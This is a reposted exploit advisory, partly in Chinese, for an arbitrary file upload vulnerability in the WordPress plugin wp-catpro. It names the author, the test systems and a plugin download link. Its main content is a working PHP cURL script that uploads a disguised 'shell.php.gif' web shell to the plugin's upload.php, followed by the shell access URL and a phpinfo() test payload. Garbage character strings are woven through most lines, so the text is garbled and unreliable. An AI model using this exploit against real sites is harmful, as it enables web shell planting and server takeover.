WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
  f0 A5 i% O9 h邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
+ ^5 s3 i& {1 S4 |% l& O下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
% R" c: j( c5 F$ s! ]! ?2 q
) b2 A- p+ [9 m* D' z) Z#=> Exploit 信息:
" N, z; ]: P% {/ }------------------
6 W' R% m' q3 x9 [# 攻击者可以上传 file/shell.php.gif
% u$ a. d8 C) u* b9 Q% E2 @: O# ("jpg", "gif", "png")  // Allowed file extensions
! D3 X- q" Y( k$ H2 f. ~# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
3 m# L# Y" h7 b) |8 ]: ~+ [
#=> Exploit
6 Y5 X+ i$ ^' N6 @0 T: y4 ]-----------
  V% J/ j. Y: V% R. ?9 ]9 a<?php
2 D; j0 G" s& x
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
, D9 X$ |9 U9 n. a& @, |- [+ y- _$ xcurl_setopt($ch, CURLOPT_POST, true);
2 P/ Z; \" `! Ucurl_setopt($ch, CURLOPT_POSTFIELDS,
8 L: F3 }- E  Narray('Filedata'=>"@$uploadfile",
" J  h* O: j+ ?1 z'folder'=>'/wp-content/uploads/catpro/'));
$ F9 Z3 O  J: q5 {4 e) B* \6 Mcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
5 y$ N* @6 u8 w" L& R( E- ?$postResult = curl_exec($ch);
0 n( |+ Y8 [0 H  @- W4 @3 zcurl_close($ch);

3 g6 ?8 s0 S' D: sprint "$postResult";
5 I1 G% m( g- n! x& P8 E
7 g# N7 a, }3 O  K9 b  Z5 ~$ TShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
7 g" a- D" }8 _$ o# ]) f<?php
* o. j- v$ S0 F$ J' h! B! uphpinfo();
?>